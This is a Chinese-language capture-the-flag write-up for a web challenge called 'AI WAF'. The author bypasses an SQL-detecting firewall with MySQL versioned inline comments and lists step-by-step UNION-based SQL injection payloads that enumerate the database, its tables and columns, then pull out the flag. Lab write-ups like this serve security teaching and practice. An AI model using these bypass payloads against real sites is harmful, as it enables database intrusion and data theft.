长城杯 WEB安全 AI WAF

根据提示，题目明确提到 "NexaData公司存储"，这通常和数据库相关。并且提示AI_WAF，

“AI WAF”通常指的是具备一定语义分析能力或强正则匹配规则的防火墙，它不仅仅匹配简单的关键

词，而是会识别 SQL 语句的结构。

根据上面的分析，极大概率是一个SQL注入绕过WAF的题目。按照正常的SQL注入流程来即

可，只不过绕过的规则可能不同。

先在kali中使用dirsearch扫描一下网址，扫除一个alert和search，但是只有alert能够访问

访问alert页面，发现是一个SQL检测识别的页面，这个应该就是题目中的AI_WAF，用来判断

网页是否遭受SQL注入攻击，以及显示用户的操作行为是SQL注入攻击的概率。

和正常的SQL注入流程一样，先找到注入点，在网页找到一个搜索框。

搜索输入1可以搜索到结果，在搜索框输入注入语句，显示无法搜索到结果，应该是备WAF过滤掉了。

查看源代码，没发现直接的参数，直接BP抓包查看格式。

通过POST方法，向/search接口发送JSON格式数据 的HTTP请求

在这里尝试了很多绕过方式，但是大多都被WAF识别拦截了。

但是在使用内联注释/!50400/时回显成功，内联注释是一个非常经典的利用 MySQL 特性

来绕过 WAF规则的技巧。

在标准SQL中，/…/里的内容会被当作注释忽略，但在MySQL中，/!50400/这代表“如果当

前数据库版本高于或等于5.04.00，则执行其中的代码”。

接下来就是正常的SQL注入流程了：

（1）确认注入点与列数

使用搜索时1有回显，可以用来作为注入点，使用order by命令判断列数为3。

1' /*!50400order*/ /*!50400by*/3#

（2）判断回显位置，爆数据库名

将参数设置为-1让前面的查询为空，强行显示后面Union的结果。

可以看到3个回显位置：content、id、title

得到数据库为nexadata，和前面提示的公司的名字一样

-1' /*!50400union*/ /*!50400select*/1,/*!50400database*/(),3#

（3）根据数据库名，爆表名

注意这里不能使用group_concat(table_name)而是用limit，被过滤掉了，当时在卡在这里试了好久。得到两个表明article、where_is_my_flagggggg

-1' /*!50400union*/ /*!50400select*/ 1,2,table_name /*!50400from*/ /*!50400information_schema*/.tables /*!50400where*/ table_schema=database() /*!50400limit*/0,1 # ​ -1'/*!50400union*/ /*!50400select*/1,2,table_name /*!50400from*/ /*!50400information_schema*/.tables /*!50400where*/table_schema=database()/*!50400limit*/1,1#

（4）根据数据库名和表名，爆列名

显然where_is_my_flagggggg表中有我们要的flag，这里表名我使用了十六进制，单引号会被识别到。得到一个列名Th15_ls_f149

-1' /*!50400union*/ /*!50400select*/1,2,column_name /*!50400from*/ /*!50400information_schema*/.columns /*!50400where*/table_name=0x77686572655f69735f6d795f666c61676767676767 /*!50400limit*/0,1#

这个地方当时忘记截图了

（5）根据表名和列名，爆字段、

最终得到flag

-1' /*!50400union*/ /*!50400select*/1,2,Th15_ls_f149/*!50400from*/ where_is_my_flagggggg /*!50400limit*/0,1#